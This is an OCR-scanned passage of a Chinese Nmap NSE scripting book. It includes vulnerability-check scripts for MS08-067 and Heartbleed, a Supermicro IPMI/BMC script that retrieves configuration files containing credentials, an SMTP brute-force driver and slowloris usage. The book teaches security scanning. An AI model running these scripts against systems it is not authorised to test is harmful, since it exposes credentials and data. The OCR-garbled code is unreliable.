
O Conficker worm infection 

O CVE-2009-3013 

O Unnamed regsvc DoS found by Ron Bowes 

虽然 这 些 漏洞 主要 存在 于 一 些 已 经 过 时 的 系统 中 ， 但 是 一 些 单位 还 在 使 用 这 些 系 统 ， 甚 


至 担任 着 十 分 重要 的 角色 〈 例 如 ， 我 经 常见 到 仍然 使 用 Windows 2003 作为 系统 的 服务 器 ， 而 
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一 些 单位 的 计算 机 也 还 在 使 用 Windows XP 办 公 )。 

































































bogon (192168153130) | SF: erminalServer,A, "\x@1\0\t\xe@\x@6\xe1\\t\xe@\x86" )%r 
(uhSRequest, 5, "xo 
SF:1\9Mt ved x06" 


bogon (192.168.153.131) 


25 
bogon (192:168.153.133) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/ 
oimicrosoft: 


VULNERABLE: 
Microsoft Windows system vulnerable to remote code execution 
《RS88-857) 
State: VULNERABLE 

1 IDs: CVE:CVE-2008-4250 

The Server service in Microsoft Windows 2008 SP4, XP 
SP2 and SP3, Server 2003 SP1 and SP2, 

Vista Gold and SPl, Server 2008, and 7 Pre-Beta 
allows remote attackers to execute arbitrary 
1 Code crafted RPC request that triggers the 
overflow during pi 


Disclosure date: 2008-10-23 
References: 
https://cve.mitre.org/cgi-bin/cvenane.cgi? 
name-CVE-2008-4250 
nttps://technet microsoft .con/en-us/1ibrary/security/ 





Service detection performed. Please report any incorrect results 
at https://nmap.org/submit/ . 
Nnap done: 1 IP address (1 host up) scanned in 501.81 seconds 

















15-4. 对 目标 进行 一 次 无 限制 扫描 的 结果 


接 下 来 研究 smb-check-vulns.NSE 脚本 。 这 个 脚本 的 设计 思路 一 共有 三 个 。 
首先 和 目标 建立 一 个 SMB 会 话 。 

然后 向 目标 发 送 一 段 非法 的 字符 串 。 

最 后 查看 目标 服务 是 否 会 接受 这 段 字符 串 ， 以 此 来 判断 目标 是 否 存在 这 个 漏洞 。 
下 面具 体 实现 这 个 脚本 。 这 个 脚本 需要 使 用 smb 和 msrpe 两 个 库 。 


local bind result, netpathcompare result 

步骤 1: 创建 一 个 SMB 会 话 。 

status, smbstate = msrpc.start smb (host, "\\\\BROWSER") 
if(status -- false) then 


return false, smbstate 
end 


步骤 2: 绑 定 .SRVSVC 服务 。 


status, bind result = msrpc.bind(smbstate,msrpc.SRVSVC UUID, 
msrpc.SRVSVC VERSION, nil) 

if(status == false) then 

msrpc.stop smb(smbstate) 
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return false, bind result 


end 


步骤 3: 构建 非法 的 字符 串 并 发 送出 去 。 


localpathl 
localpath2 


= "AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANN. .\\n" 
= "\\n" 


status,netpathcompare_result = msrpc.srvsvc netpathcompare (smbstate, 
host.ip, pathl,path2, 1, 0) 


步骤 4: 结束 这 个 SMB 会 话 。 


msrpc.stop_smb (smbstate) 


步骤 5: 进行 判断 。 


if(status- 


7 false) then 


if(string.find(netpathcompare result,"WERR INVALID PARAMETER") -- nil) then 
returntrue, INFECTED 

elseif(string.find(netpathcompare result,"INVALID NAME") -- nil) then 
returntrue, PATCHED 


else 


returntrue, UNKNOWN, netpathcompare result 


end 
end 


return true, VULNERABLE 


end 


当 对 某 个 目标 执行 这 个 脚本 的 时 候 ， 如 果 这 个 目标 上 存在 一 个 SMB 漏洞 ， 就 会 显示 如 


下 的 结果 。 


Hostscript 


results: 


smb-check-vulns: 


MS08-067: VULNERABLE 
Conficker: Likely CLEAN 
regsvc DoS: regsvc DoS: ERROR (NT STATUS ACCESS DENIED 
SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE 
MS06-025: NO SERVICE (the Ras RPC service is inactive) 
MS07-029: NO SERVICE (the Dns Server RPC service isinactive) 


通过 这 个 案例 ， 可 以 知道 NSE 库 使 得 漏洞 检测 变 得 十 分 简单 。NSE 库 完成 了 网 络 连 接 
部 分 的 内 容 ， 如 果 下 一 次 发 现 了 新 的 SMB 漏洞 ， 就 无 须 对 这 个 程序 进行 大 的 改动 ， 所 做 的 
仅仅 是 修改 进行 检测 的 向 量 即 可 。 


15.5 Xj heartbleed 漏洞 进行 渗透 


SSL (安全 套 接 层 ) 协议 是 世界 上 使 用 最 为 普遍 的 网 站 加 密 技术 ， 而 OpenSSL 作为 开源 
的 SSL 套件 ， 目 前 已 经 为 全 球 成 千 上 万 的 Web 服务 器 所 使 用 。Web 服务 器 正 是 通过 它 来 将 
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密 角 发送 给 访客 ， 然 后 在 双方 的 连接 之 间 对 信息 进行 加 密 。URL 中 使 用 https 作为 前 级 的 连 
接 都 采用 了 SSL 加 密 技 术 。 在 线 购物 、 网 银 等 活动 均 采 用 SSL 技术 来 防止 窃 密 及 避免 中 间 
Hi. Heartbleed 漏洞 之 所 以 得 名 ， 是 因为 用 于 安全 传输 层 协议 (TLS) 及 数据 包 传 输 层 安 
全 协议 (DTLS) 的 Heartbeat 扩展 存在 漏洞 。Heartbeat 扩展 为 TLS/DTLS 提供 了 一 种 新 的 简 
便 的 连接 保持 方式 ， 但 由 于 OpenSSL 1.0.2-beta 与 OpenSSL 1.0.1 在 处 理 TLS heartbeat 扩展 
时 的 边界 错误 ， 攻 击 者 可 以 利用 漏洞 披露 连接 的 客户 端 或 服务 器 的 存储 器 内 容 ， 导 致 攻击 者 
不 仅 可 以 读 取 其 中 机 密 的 加 密 数据 ， 还 能 资 走 用 于 加 密 的 密 钥 。 





这 个 漏洞 被 形容 为 史上 最 严重 的 资 安 漏洞 OpenSSL 的 Heartbleed 漏洞 ， 全 球 三 分 之 











二 的 网 站 面临 着 这 个 漏洞 的 威胁 。 这 项 严重 缺陷 (CVE-2014-0160 ) 的 产生 是 由 于 未 能 在 
memcpy() 调用 受害 用 户 输入 内 容 作为 长 度 参数 之 前 正确 进行 边界 检查 。 攻 击 者 可 以 追踪 
OpenSSL 所 分 配 的 64KB 缓存 、 将 超出 必要 范围 的 字 节 信息 复制 到 缓存 当中 
容 ， 这 样 一 来 受害 者 的 内 存 内 容 就 会 以 每 次 64KB 的 速度 进行 泄漏 。 


P 再 返回 缓存 内 





接 下 来 研究 如 何 利 用 NSE 来 编写 一 个 针对 这 个 漏洞 的 检测 脚本 。 这 个 脚本 中 将 使 用 tls 


库 来 完成 TLS 和 SSL 的 信息 发 送 与 接收 。 具 体 步 又 如 下 。 


步骤 1: 使 用 函数 tls.client_hello() 创建 client_hello 消息 。 


local hello = tls.client hello(( 

"protocol"] - version, 

-- Claim to support every cipher 

-- Doesn't work with IIS, but IIS isn't vulnerable 
"ciphers"] = keys(tls.CIPHERS), 

["compressors"] = ("NULL"), 

"extensions"] = ( 

-- Claim to support every elliptic curve 
["elliptic curves"] - tls.EXTENSION HELPERS["elliptic curves"] 
(keys (tls.ELLIPTIC CURVES)), 

-- Claim to support every EC point format 





"ec point formats"] = tls.EXTENSION HELPERS["ec point formats"] 
(keys(tls.EC POINT FORMATS)), 
"heartbeat"] = "\x01", -- peer not allowed to send 


r 
) 


步骤 2: 利用 tls.record_write(type, protocol, body) 函数 来 定义 Heartbeat 请 求 。 


local payload = stdNSE.generate random string(19) 

local hb = tls.record write("heartbeat", version, bin.pack("C»SA",1, 
-- HeartbeatMessageType heartbeat request 

0x4000, -- payload length (falsified) 

-- payload length is based on 4096 - 16 bytes padding - 8 bytes packet 
-- header + 1 to overflow 

payload -- less than payload length. 

) 

) 
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步骤 3 : 在 tls 库 中 并 没有 处 理 socket 的 通信 ， 这 一 点 需要 自己 来 实现 。 为 了 能 发 送 


client hello 信息 ， 需 要 使 用 Nmap.new_socket() fil tls.getPrepareTLSWithoutReconnect(port) 来 
创建 连接 。 





local s 

local specialized = sslcert.getPrepareTLSWithoutReconnect (port) 
if specialized then 

local status 

status, s = specialized(host, port 

if not status then 

stdNSE .debug3 ("Connection to server failed") 
return 

end 

else 

s = Nmap.new socket() 

local status - s:connect(host, port) 

if not status then 

stdNSE.debug3 ("Connection to server failed") 
return 

end 

end 

S:set timeout (5000) 

-- Send Client Hello to the target server 
local status, err - s:send(hello) 

if not status then 

stdNSE.debugl("Couldn't send Client Hello: $s", err 
s:close() 

return nil 

end 


步骤 4: 通过 函数 tls.record. read() 读 取 一 个 SSL/TLS 记录 并 检查 Heartbeat extension 漏洞 。 


-- Read respoNSE 

local done - false 
local supported - false 
local i = 1 

local respoNSE 


repeat 
status, respoNSE, err = tls.record_buffer (s, respoNSE, i) 
if err == "TIMEOUT" then 


-- Timed out while waiting for server_hello_done 

-- Could be client certificate required or other message required 
-- Let's just drop out and try sending the heartbeat anyway. 
done - true 

break 

elseif not status then 

StdNSE.debugl("Couldn't receive: $s", err 

s:close() 

return nil 

end 
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local record 
i, record = tls.record read(respoNSE, i) 


if record -- nil then 
StdNSE.debugl("Unknown respoNSE from server" 
s:close() 


return nil 

elseif record.protocol -- version then 
StdNSE.debugl("Protocol version mismatch") 
s:close() 

return nil 

end 

if record.type "handshake" then 

for , body in ipairs(record.body) do 

if body.type -- "server hello" then 

if body.extensions and body.extensions["heartbeat"] == "Ax01" then 
supported - true 

end 

elseif body.type -- "server hello done" then 
StdNSE.debugl ("we're done!") 

done - true 

end 

end 

end 





until done 

if not supported then 

stdNSE.debugl("Server does not support TLS Heartbeat Requests.") 
s:close() 

return nil 

end 


步骤 5: 通过 socket 连接 发 送 Heartbeat 请 求 包 。 


status, err = s:send(hb) 

if not status then 

stdNSE.debugl("Couldn't send heartbeat request: $s", err) 
s:close() 

return nil 

end 


步骤 6: 读 取 回 应 包 的 内 容 ， 检 测 目标 服务 器 是 否 存在 漏洞。 


while (true) do 

local status, typ, ver, len = recvhdr(s) 

if not status then 

StdNSE.debugl('No heartbeat respoNSE received, server likely not vulnerable') 
break 





end 

if typ == 24 then 

local pay 

status, pay = recvmsg(s, 0x0fe9) 
s:close() 


if #pay > 3 then 
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return true 

else 

stdNSE.debugl('Server processed malformed heartbeat, but did not return any 
extra data.') 

break 

end 

elseif typ -- 21 then 

StdNSE.debugl('Server returned error, likely not vulnerable") 
break 

end 

end 


如 果 目 标 计算 机 上 安装 了 存在 这 个 漏洞 的 OpenSSL， 那 么 对 这 个 计算 机 使 用 ssl- 
heartbleed.NSE 进行 扫描 的 时 候 ， 就 可 以 发 现 这 个 漏洞 。 


-- PORT STATE SERVICE 

-- 443/tcp open https 

-- | ssl-heartbleed: 

eel VULNERABLE: 

-- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL 
cryptographic software library. It allows for stealing information intended to be 
protected by SSL/TLS encryption. 

ssi] State: VULNERABLE 

exul Risk factor: High 

se j Description: 

zl OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 
1.0.2-betal) of OpenSSL are affected by the Heartbleed bug. The bug allows for 
reading memory of systems protected by the vulnerable OpenSSL versions and could 
allow for disclosure of otherwise encrypted confidential information as well as the 
encryption keys themselves. 


15.6 vulns 库 中 的 漏洞 功能 


vulns 库 提 供 了 一 套 十 分 有 用 的 漏洞 管理 功能 ， 它 的 目的 是 提供 一 个 常见 的 漏洞 存储 和 
报告 接口 。 在 Nmap 执行 时 ， 这 些 漏洞 的 信息 可 以 保存 在 registry 中 ， 其 他 的 脚本 可 以 访问 
这 个 registry。 这 个 库 定 义 了 如 下 状态 。 

O vulns.STATE.NOT VULN 

Q vulns.STATE.LIKELY VULN 

Q vulns.STATE. VULN 

O vulns.STATE.DoS 

Q vulns.STATE.EXPLOIT 

漏洞 报告 以 Lua 表 的 形式 进行 传递 ， 一 个 漏洞 报告 表 包 含 如 下 一 些 字段 。 

Q title (必需 ) 
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口 state (必需 ) 

口 IDS (可 选 ) 

Q risk factor (可 选 ) 
口 scores (可 选 ) 
口 description (可 选 ) 

Q dates (可 选 ) 

口 check results (可 选 ) 

O exploit results (可 选 ) 

Q extra. info (可 选 ) 

Q references (可 选 ) 

这 里 以 ssl-heartbleed 漏洞 报告 表 为 例 进行 介绍 ， 如 下 所 示 。 


local vuln table = ( 

title - "The Heartbleed Bug is a serious vulnerability in the popular OpenSSL 
cryptographic software library. It allows for stealing information intended to be 
protected by SSL/TLS encryption.", 

State = vulns.STATE.NOT VULN, 

risk factor - "High", 

description - [[ 

OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2- 
betal) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading 
memory of systems protected by the vulnerable OpenSSL versions and could allow for 
disclosure of otherwise encrypted confidential information as well as the encryption 
keys themselves. 11, 

references - ( 

'https://cve.mitre.org/cgi-bin/cvename.cgi?name-CVE-2014-0160', 
'http://www.openssl.org/news/secadv 20140407.txt ', 
'http://cvedetails.com/cve/2014-0160/" 








) 
) 
创建 一 个 脚本 ， 这 个 脚本 利用 了 一 个 IPMU/BMC 控制 器 漏洞 ， 导 致 攻击 者 可 以 通过 一 个 
简单 的 请 求 就 获得 目标 的 配置 情况 。 
下 面 给 出 这 个 脚本 的 核心 代码 。 
首先 导入 所 需 的 库 文件 。 


local http = require "http" 

local Nmap = require "Nmap" 

local shortport = require "shortport" 
local string = require "string" 

local vulns = require "vulns" 

local stdNSE = require "stdNSE" 


设 定 执行 规则 如 下 。 
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portrule = shortport.portnumber(49152, "tcp") 


由 于 通过 这 个 漏洞 获取 到 的 配置 文件 过 于 庞大 ， 无 法 直接 进行 展示 ， 因 此 将 获取 的 配置 
放置 到 硬盘 的 一 个 文件 中 。 


local function write file(filename, contents) 
local f, err - io.open(filename, "w") 
if not f then 
return f, err 
end 





f:write (contents) 
f:close() 
return true 

end 


接 下 来 定义 漏洞 表 ， 然 后 将 漏洞 的 state 设置 为 vulns.STATE.NOT_VULN。 之 后 脚本 会 
请 求 /PSBlock 页 面 ， 并 对 目标 的 回应 进行 检查 。 如 果 得 到 的 回应 是 一 个 配置 文件 ， 脚 本 会 
将 这 个 文件 保存 到 指定 位 置 ， 然 后 将 漏洞 的 state 设置 为 vulns.STATE.EXPLOIT。 最 后 返回 
vulns.Report:make output() 函数 的 结果 。 


action = function(host, port) 
local fw - stdNSE.get script args(SCRIPT NAME..".out") 


or host.ip.." bmc. 
conf" 
local vuln = ( 
title - 'Supermicro IPMI/BMC configuration file disclosure', 
state = vulns.STATE.NOT VULN, 
description - [[ 


Some Supermicro IPMI/BMC controllers allow attackers to download 


a configuration file containing plain text user credentials. 
may be used 


This credentials 
to log in to the administrative interface and the 
network's Active Directory.]], 
references - ( 
'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and- 
some-added- 
extras/', 
), 
dates = ( 
disclosure = (year = '2014', month = '06', day = '19'), 
) 


local vuln report - vulns.Report:new(SCRIPT NAME, host, port) 
local open session - http.get(host.ip, port, "/PSBlock") 


if open session and open session.status --200 and string.len(open session. 
body)»200 then 


S = open session.body:gsub("$z", ".") 
vuln.state - vulns.STATE.EXPLOIT 
vuln.extra info = "Snippet from configuration file: MVn"..string.sub(s, 25, 200) 
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local status, err = write file(fw,s) 
if status then 
extra info = string.format("MnConfiguration file saved to '$s'Wn", fw) 


else 
StdNSE.debug(1, "Error saving configuration file to '$s': $sWn", fw, err 
end 
vuln.extra info = "Snippet from configuration file:Wn"..string.sub(s, 25, 
200)..extra info 
end 
return vuln report:make output (vuln) 
end 
现在 ， 如 果 对 一 个 有 漏洞 的 IPMUBMC 控制 器 进行 测试 ， 可 以 得 到 如 下 结果 。 
PORT STATE SERVICE REASON 
49152/tcp open unknown syn-ack 
| supermicro-ipmi-conf: 
VULNERABLE: 


l 
I Supermicro IPMI/BMC configuration file disclosure 
| State: VULNERABLE (Exploitable) 

l Description: 

| Some Supermicro IPMI/BMC controllers allow attackers to download 

I a configuration file containing plain text user credentials. This 
credentials may be used to log in to the administrative interface and the 

| network's Active Directory. 

l Disclosure date: 2014-06-19 

1 Extra information: 

I Snippet from configuration file: 
l 


ETORT EE 3ispring.o oe re a NXOTNXOINXOT E i ne 
XxO0lADMIN......... s ThISISApAsSwOrD.......... ee TT. Ce osi Nx01Nx01Nx01- 
SNX01...ls. NxOlipmi........ sess w00t!... serere be a cssus d osas ais 

1 Configuration file saved to 'xxx.xxx.xxx.xxx bmc.conf' 


|References: 
JES http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and- 
Ssome-added-extras/ 


小 结 


本 章 学 习 了 如 何 使 用 NSE 中 功能 强大 的 库 文件 来 开发 各 种 脚本 。 通 过 这 些 脚本 可 以 节 
省 大 量 的 时 间 和 精力 。 我 们 对 RealVNC 服务 器 的 认证 绕 过 、Windows SMB、OpenSSL 的 
Heartbleed、IPMI/BMC 上 的 配置 文件 泄漏 这 几 个 漏洞 进行 了 脚本 开发 ， 逐 步 学 握 了 漏洞 脚本 
开发 的 过 程 。 另 外 ， 在 这 一 章 中 也 学 到 了 vulns 库 文件 的 使 用 ， 这 个 文件 可 以 帮助 准确 报告 
漏洞 的 信息 。 


CHAPTER 


第 16 章 
16 NSE 的 并 发 执行 


NSE 脚本 默认 是 按照 Lua 的 单线 程 机 制 执行 的 。 不 过 NSE 支持 多 种 并 发 执行 。 在 这 一 
章 中 ， 将 会 介绍 在 NSE 中 如 何 实现 并 发 执行 。 

本 章 将 要 介绍 的 内 容 如 下 。 

口 Lua 语言 中 的 coroutine。 

口 条 件 变量 。 

口 ERE 

Q NSE 线程 。 

口 在 扫描 期 间 并 发 的 其 他 影响 因素 。 

在 这 一 章 中 ， 将 完成 对 Lua MNSE 中 并 发 执行 内 容 的 学 习 。 同 时 将 了 解 到 脚本 并 发 执 
行 的 优势 。 下 面 先 来 看 一 些 关 于 Nmap 中 的 并 发 执行 实例 。 





16.1 Nmap 中 的 并 发 执行 
Nmap 中 跟 并 发 有 关 的 4 个 选项 如 下 。 


口 --min-hostgroup 

口 --max-hostgroup 
口 --min-parallelism 
a 


--max-parallelism 
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Nmap 将 多 个 目标 IP 地 址 空间 分 成 扫描 组 ， 然 后 在 同一 时 间 对 一 个 扫描 组 进行 扫描 。 
hostgroup 代表 了 一 个 扫描 组 ， 参 数 --min-hostgroup 和 --max-hostgroup 决定 了 这 个 扫描 
组 中 数量 的 下 限 和 上 限 。 通 常 ， 一 个 扫描 组 中 的 数量 越 大 ,扫描 就 会 越 快 。 需 要 注意 的 
是 ， 只 有 当 整 个 组 扫描 结束 后 才 会 提供 主机 的 扫描 结果 。 可 以 使 用 如 下 的 方式 来 修改 扫描 
的 选项 。 


Nmap -sC -F --min-hostgroup 500 «target» 
Nmap -sC -F --max-hostgroup 100 «target» 
Nmap -sC -F --min-hostgroup 500 --max-hostgroup 800 «target» 


—min-parallelism«milliseconds 和 --max-parallelism «millseconds» 控制 了 Nmap 进行 扫描 
时 同一 时 间 发 送 的 报 文 数量 ， 例 如 可 以 指定 同一 时 间 至 少 发 送 500 个 报 文 。 

Nmap -sC -F --min-parallelism 500 «target» 

另外 ， 还 有 一 些 特殊 的 脚本 ， 如 http-slowloris.NSE 在 执行 时 需要 设 定 参 数 --max- 
parallelism 以 后 才能 正常 工作 ， 这 里 以 最 多 同一 时 间 发 送 400 个 报 文 为 例 进 行 介绍 。 


Nmap -p80 --script http-slowloris --max-parallelism 400 <target> 





16.2 Nmap 中 的 时 序 模式 


有 时 可 能 并 不 知道 上 面 介 绍 的 4 个 参数 到 底 应 该 设置 为 多 少 ， 因 此 Nmap 中 提供 了 一 种 
时 序 模式 〈Timing templates) 的 工作 方式 。 根 据 对 这 4 个 参数 的 优化 设置 的 不 同 ，Nmap 中 
提供 6 种 时 序 模式 。 可 以 使 用 选项 -T[0-5] 来 选择 这 些 时 序 模式 。 


Dt Timing report --------------- 
hostgroups: min 1, max 100000 
rtt-timeouts: init 500, min 100, max 1250 
max-scan-delay: TCP 10, UDP 1000, SCTP 10 
parallelism: min 0, max 0 
max-retries: 6, host-timeout: 0 
min-rate: 0, max-rate: 0 


这 些 时 序 模式 除了 这 种 用 数字 表示 的 方法 ， 还 可 以 使 用 别名 的 方式 来 代替 这 些 数字 。 例 
如 -T1 的 别名 是 Sneaky, -T5 的 别名 是 Insane。 


Sneaky (-1): This generates the following report: 
dudcózaechIeeec Timing report --------------- 
hostgroups: min 1, max 100000 
rtt-timeouts: init 15000, min 100, max 15000 
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 
parallelism: min 0, max 1 
max-retries: 10, host-timeout: 0 
min-rate: 0, max-rate: 0 
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Insane (-5): This generates the 
Timing report 
hostgroups: min 1, max 100000 
rtt-timeouts: init 250, 
max-scan-delay: TCP 5, 
parallelism: min 0, max 0 

2, host-timeout: 


max-retries: 


min-rate: 0, max-rate: 0 


16.3 Lua 中 的 并 发 执行 


在 这 一 部 分 3 
发 执行 。 

coroutine 是 Lua 中 的 一 种 非常 实用 
个 coroutine 在 执行 时 都 有 自己 的 堆栈 。 








min 50, 
UDP 1000, 
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following report: 


max 300 
SCTP 5 


900000 


E 要 介绍 Lua 语言 中 的 并 发 执行 。Lua 语言 中 采用 coroutine 的 方式 来 实现 并 


的 功能 ， 开 发 人 员 利 用 它 可 以 并 发 执行 多 任务 。 每 一 
coroutine 与 传统 的 线程 执行 方式 有 一 点 明显 的 不 同 ， 





coroutine 在 执行 时 可 以 实现 上 下 文 数据 的 共享 。 但 是 也 必须 注意 到 要 减少 执行 时 的 信息 开 


销 。 其 实在 任何 的 一 个 时 间 段 号 
才能 实现 多 线程 。 





旦 ， 真 正 执 行 的 只 有 一 个 任务 。 这 些 任务 必须 不 断 地 交替 执行 


Lua 规定 一 个 coroutine 可 能 的 状态 有 如 下 三 种 。 


口 运行 (running) 
口 暂停 (suspended) 
口 消亡 (dead) 


coroutine 的 执行 可 以 由 函数 coroutine.yield() 和 coroutine.resume() 控制 。 下 面 列 出 了 一 


些 coroutine 可 以 完成 的 操作 。 


O coroutine.create(f): 这 个 函数 用 来 完成 对 coroutine 的 创建 了 


[ 作 。 





O coroutine.resume (co [, vall,: : :]) : 这 个 函数 用 来 完成 将 coroutine 的 状态 从 暂停 变 为 


运行 。 
口 coroutine.running(): 这 个 函数 返 
口 coroutine.status(co): 这 个 函数 返 


回 当前 正在 执行 的 coroutine。 





回 coroutine 的 状态 。 


Q coroutine.wrap(f) : 这 个 函数 与 coroutine.create() 和 coroutine.resume() 的 作用 基本 相同 。 


口 coroutine.yield(. © -): 这 个 函数 


用 来 暂停 coroutine。 


下 面 给 出 了 一 些 coroutine 执行 的 实例 ， 具 体 步 又 如 下 。 
步骤 1 : 使 用 coroutine.create() 创建 一 个 coroutine。 这 个 coroutine 中 有 一 个 循环 函数 ， 
同时 实现 了 数字 1 ~ 5 的 打印 输出 和 和 暂停 另 一 个 coroutine。 


col = coroutine.create( 
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function() 
for i - 1, 5 do 
print("coroutine #1:"..i) 
coroutine.yield(co2) 
end 
end 


) 
步骤 2: 同样 的 方式 ， 创 建 另 一 个 coroutine， 使 用 co2 作为 coroutine 的 名 字 。 


CO2 = coroutine.create( 


function() 
for i = 1, 5 do 
print("coroutine $2:"..i) 
coroutine.yield(col) 
end 
end 
) 


步骤 3: 使 用 另外 一 个 循环 来 运行 这 两 个 coroutine。 


for i = 1, 5 do 
coroutine.resume (col) 
coroutine. resume (co2) 
end 


这 个 脚本 最 后 完成 的 样子 如 图 16-1 所 示 (这 里 我 使 用 了 SciTE 完成 Lua 脚本 的 执行 )。 
i oN Teamen eE SE 


Sos c ciini 

|| Eile Edit Search View Iools Options Language Buffers 

iD Hé): m&Qsgo»Nms sx 

$' Jopt/TocaT/bin/Tua 

-col = coroutine.create( 

= function() 

- | fori=1,5 do 
| T Cr 

coroutine、 











end 


) 
-Co2 = coroutine.create( 
- function() 
- | fori*-1,5 do 
i print("coroutine $2:"..1i) 
i coroutine. yield(col) 


1 end 
-for i - 1, 5 do 


coroutine.resume(col) 
coroutine.resume(co2) 


HBSoSUSSRUEEBoosousunel 


M 
N 














[L 22 Col: 1 Se: 0 | Saved: 2016/11/3 星期 四 ^r 8:57:30 | [INS] [CR 











图 16-1 X coroutine 程序 
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执行 这 个 脚本 ,结果 如 图 16-2 所 示 。 





>Tua -e "io.stdout:setvbuf "no Tsect. Tua 
coroutine #1: 

coroutine #2: 
coroutine #1: 
coroutine #2: 
coroutine #1: 
coroutine #2: 
coroutine #1: 
coroutine $2: 
coroutine #1: 
coroutine #2: 
>Exit code: Q 


GOERUUNKEE 


rm 
Ln: 22 Col: 1 Sel: 0 | Saved: 2016/11/3 星期 四 上 午 8:57:30 | [INS] [CR 











16-2. XX coroutine 程序 的 执行 结果 


如 果 想 看 到 这 个 程序 更 为 具体 的 执行 过 程 ， 可 以 对 代码 进行 修改 ， 使 用 coroutine. 
running() 函数 输出 正在 执行 的 函数 ， 修 改 以 后 的 代码 如 图 16-3 所 示 。 


Topt [7 
HN = dac dines restat 
- function) 
i fori -1, 5 do 
i print coroutine. rain 
print("coroutine #1: 
coroutine. yield(co2) 


) 
c 


02 = coroutine.create( 


- Function 

- for i - 1, 5 do 
print(coroutine. ruming) 
print("coroutine $2: 
Coroutine. yield(col) 


end 


) 
-for i - 1, 5 do 
coroutine.resume(col) 
coroutine.resume(co2) 








|n: 24 Coli Sek 0 | Saved: 2016/11/3 星期 四 上 午 9:04:01 | [INS] [CR«lI 











图 16-3 ”改进 后 的 双 coroutine 程序 
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这 个 Lua 脚本 执行 后 的 输出 如 图 16-4 所 示 。 


lua -e "io. LOO setvbuf 'no'" "bisect. lua" 
hread: OO4BDF! 





Exit code: 0 





图 16-4 改进 后 的 双 coroutine 程序 的 执行 结果 


再 对 这 个 脚本 改进 一 下 ， 让 它 能 在 执行 的 过 程 中 随时 输出 coroutine 的 状态 ， 以 及 
coroutine.yield() 操作 的 结果 ， 如 图 16-5 所 示 。 





























opt. T 
Boot = coroutine. createC 
- function() 

10 do 


= or i=1 
print("Coroutine #1 is " ES 
print("Coroutine #2 is oroutine,status(co2 

print("coroutine 41:".. 
coroutine. yield(co2) 


) 

- co2 = coroutine.create( 

- function() 

- for i - 1, 10 do 
print("Coroutine #1 is " corout ine. status (codo) 
print("Coroutine #2 i ..Coroutine.status(co2 
print("coroutine $2: 
coroutine. yield(col) 


» 
-for i = 1, 10 do 
coroutine. Pese (Cro 
coroutine.resume(co2) 








D 
Ln: 26 Col 1 Sel 0 | Saved: 2016/11/3 上 午 9:04:00 | [INS] [CRF] | 


图 16-5 再 次 改进 后 的 双 coroutine 程序 
这 个 程序 执行 的 结果 如 图 16-6 所 示 。 
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>lua -e "io.stdout:setvbuf 'no'" "bisect. lua" 
Icoroutine #1 is running 
|Coroutine #2 is suspended 
coroutine 41:1 

|coroutine #1 is suspended 
|coroutine 42 is running 
coroutine 42:1 

coroutine #1 is rumning 
|coroutine #2 is suspended 
coroutine #1:2 

|coroutine #1 is suspended 
Icoroutine 42 is running 
coroutine #2:2 

|coroutine #1 is rumning 
|coroutine #2 is suspended 
coroutine #1:3 

|coroutine #1 is suspended 
|coroutine 42 is running 
coroutine $2:3 

ICoroutine #1 is running 
|coroutine 42 is suspended 
coroutine #1:4 

|coroutine 41 is suspended 
|coroutine 42 is running 
coroutine #2:4 

ICoroutine #1 is running 
|coroutine #2 is suspended 
coroutine 41:5 

|coroutine 41 is suspended 
Icoroutine 42 is running 
coroutine #2:5 

>Exit code: 0 


图 16-6 再 次 改进 后 的 双 coroutine 程序 执行 效果 
库 文件 stdNSE 中 包含 的 stdNSE.base() 方法 可 以 帮助 我 们 更 好 地 了 解 coroutine。 例 如 ， 
使 用 coroutine.status() 函数 就 可 以 随时 知道 coroutine 的 状态 。 


basethread = stdNSE.base() 





if ( self.quit or coroutine.status(self.basethread) -- 'dead' ) then 
table.iNSErt(respoNSE queue, (false, ( err - false, msg - "Quit 
signalled by 
crawler" ) ]) 
break 
end 


再 来 看 看 另 一 个 例子 。 在 一 个 针对 SMTP 服务 的 脚本 smtp-brute.NSE 中 创建 了 一 个 
table， 这 个 table 中 存储 了 每 个 运行 的 coroutine 之 间 的 联系 ， 这 个 过 程 是 利用 coroutine. 
running() 函数 实现 的 。 这 个 脚本 的 代码 如 下 所 示 。 


local brute = require "brute" 

local coroutine - require "coroutine" 
local creds - require "creds" 

local shortport = require "shortport" 
local smtp = require "smtp" 

local stdNSE = require "stdNSE" 














-- By using this connectionpool we don't need to reconnect the socket 
-- for each attempt. 

ConnectionPool = {} 

Driver = 
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connect = function( self ) 
self.socket = ConnectionPool[coroutine.running()] 
if ( not(self.socket) ) then 
self.socket = smtp.connect(self.host, self.port, ( ssl = true, recv before = 


true ]) 
if ( not(self.socket) ) then return false end 
ConnectionPool[coroutine.running()] = self.socket 
end 
return true 
end, 


login - function( self, username, password ) 
local status, err - smtp.login( self.socket, username, password, mech ) 
if ( status ) then 
smtp.quit(self.socket) 


ConnectionPool[coroutine.running()] = nil 

return true, creds.Account:new(username, password, creds.State.VALID) 
end 

if ( err:match("^ERROR: Failed to .*") ) then 

self.socket:close() 

ConnectionPool[coroutine.running()] = nil 


local err - brute.Error:new( err ) 

-- This might be temporary, set the retry flag 
err:setRetry( true ) 

return false, err 


end 
return false, brute.Error:new( "Incorrect password" ) 
end, 
-- Disconnects from the server (release the connection object back to 
-- the pool) 


disconnect - function( self ) 
return true 
end, 


) 
最 后 这 个 脚本 将 连接 池 中 全 部 socket 链接 进行 了 关闭 操作 。 


for , sock in pairs(ConnectionPool) do 
sock:close() 
end 


现在 已 经 完成 了 对 Lua 中 并 发 执行 的 研究 ， 下 一 节 将 研究 NSE 中 的 并 发 执行 机 制 。 


16.4 NSE 中 的 并 发 执行 


在 使 用 NSE 处 理 并 发 执行 时 ， 并 不 需要 考虑 资源 的 保护 ， 因 为 Nmap 是 单线 程 的 。 但 是 
当 在 处 理 大 规模 的 脚本 实例 时 ， 就 需要 考虑 网 络 的 带宽 以 及 socket 的 限制 等 问题 。 
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16.4.1 NSE 中 的 线程 
